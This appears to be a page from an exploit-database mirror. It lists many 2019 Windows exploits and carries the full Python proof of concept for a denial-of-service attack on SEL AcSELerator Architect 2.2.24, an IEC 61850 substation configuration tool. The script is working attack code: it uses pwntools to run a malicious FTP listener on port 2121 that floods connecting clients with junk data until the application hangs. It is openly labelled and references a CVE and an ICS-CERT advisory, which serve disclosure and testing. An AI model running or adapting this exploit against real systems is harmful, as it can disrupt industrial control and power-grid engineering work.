Menu

Improved exploit search engine. Try it out

"SEL AcSELerator Architect 2.2.24 - CPU Exhaustion Denial of Service"

Author

LiquidWorm

Platform

windows

Release date

2019-05-16

Release Date Title Type Platform Author
2019-05-24 "Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption" remote windows "Simon Zuckerbraun"
2019-05-24 "Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow" local windows "Uday Mittal"
2019-05-15 "Microsoft Windows - 'Win32k' Local Privilege Escalation" local windows ExpLife0011
2019-05-22 "Microsoft Internet Explorer 11 - Sandbox Escape" local windows SandboxEscaper
2019-05-22 "Microsoft Windows (x84) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation" local windows "Google Security Research"
2019-05-22 "Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 (17763.379) - Install DLL" local windows SandboxEscaper
2019-05-24 "Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)" dos windows Achilles
2019-05-24 "Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-23 "Terminal Services Manager 3.2.1 - Denial of Service" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Share Name' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Add Block' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-22 "TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "BlueStacks 4.80.0.1060 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-21 "Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "Huawei eSpace 1.1.11.103 - DLL Hijacking" local windows LiquidWorm
2019-05-20 "BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "docPrint Pro 8.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "PCL Converter 2.7 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "Encrypt PDF 2.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
Release Date Title Type Platform Author
2019-05-20 "Huawei eSpace 1.1.11.103 - DLL Hijacking" local windows LiquidWorm
2019-05-20 "Huawei eSpace 1.1.11.103 - 'ContactsCtrl.dll' / 'eSpaceStatusCtrl.dll' ActiveX Heap Overflow" dos windows LiquidWorm
2019-05-20 "Huawei eSpace 1.1.11.103 - Image File Format Handling Buffer Overflow" dos windows LiquidWorm
2019-05-20 "Huawei eSpace Meeting 1.1.11.103 - 'cenwpoll.dll' SEH Buffer Overflow (Unicode)" dos windows LiquidWorm
2019-05-15 "Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php LiquidWorm
2019-05-16 "SEL AcSELerator Architect 2.2.24 - CPU Exhaustion Denial of Service" dos windows LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - SQL Injection" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - Information Disclosure" webapps php LiquidWorm
2019-04-23 "Ross Video DashBoard 8.5.1 - Insecure Permissions" local windows LiquidWorm
2019-03-14 "Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)" webapps php LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2019-01-28 "BEWARD Intercom 2.3.1 - Credentials Disclosure" local windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection" webapps windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery" webapps windows LiquidWorm
2018-11-30 "Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass" webapps cgi LiquidWorm
2018-11-21 "Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2018-11-05 "Microsoft Internet Explorer 11 - Null Pointer Dereference" local windows LiquidWorm
2018-10-17 "TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2018-10-08 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure" webapps hardware LiquidWorm
2018-10-06 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download" webapps hardware LiquidWorm
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46859/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46859/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46859/41288/sel-acselerator-architect-2224-cpu-exhaustion-denial-of-service/download/", "exploit_id": "46859", "exploit_description": "\"SEL AcSELerator Architect 2.2.24 - CPU Exhaustion Denial of Service\"", "exploit_date": "2019-05-16", "exploit_author": "LiquidWorm", "exploit_type": "dos", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
#!/usr/bin/env python
# coding: utf8
#
#
# SEL AcSELerator Architect 2.2.24 Remote CPU Exhaustion Denial of Service
#
#
# Vendor: Schweitzer Engineering Laboratories, Inc.
# Product web page: https://www.selinc.com
# Affected version: 2.2.24.0 (ICD package version: 2.38.0)
#
# Summary: Substation communications networks using the IEC 61850
# MMS and GOOSE protocols require a systemic methodology to configure
# message publications and subscriptions. acSELerator Architect
# SEL-5032 Software is a Microsoft Windows application that streamlines
# the configuration and documentation of IEC 61850 control and SCADA
# communications.
#
# Description: AcSELerator Architect is prone to a denial-of-service (DoS)
# vulnerability. An attacker may exploit this issue to cause CPU exhaustion,
# resulting in application rendered non-responsive (AppHangB1 event).
#
# Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
#
# Advisory: https://applied-risk.com/index.php/download_file/view/106/165
# ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-18-191-02
# CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10608
#
# 22.02.2018
#

from pwn import *

cool_data = '\x4A' * 54321

def bunn():

    print """
    ####################################
     SEL AcSELerator Architect 2.2.24.0
      FTP Client Remote CPU Exhaustion
                 
                 (c) 2018
    ####################################
    """

def main():

    p = listen(2121)
    try:
        log.warn('Payload ready for deployment...(Ctrl-C for exit)\n')
        while True:
            p.wait_for_connection()
            if p:
                sys.stdout.write('▓≡')
                p.send(cool_data)
    except KeyboardInterrupt:
        p.success('OK!')
        p.close()
    except EOFError:
        print "Unexpected error brah:", sys.exc_info()[0]
        p.close()

if __name__ == '__main__':
    bunn()
    main()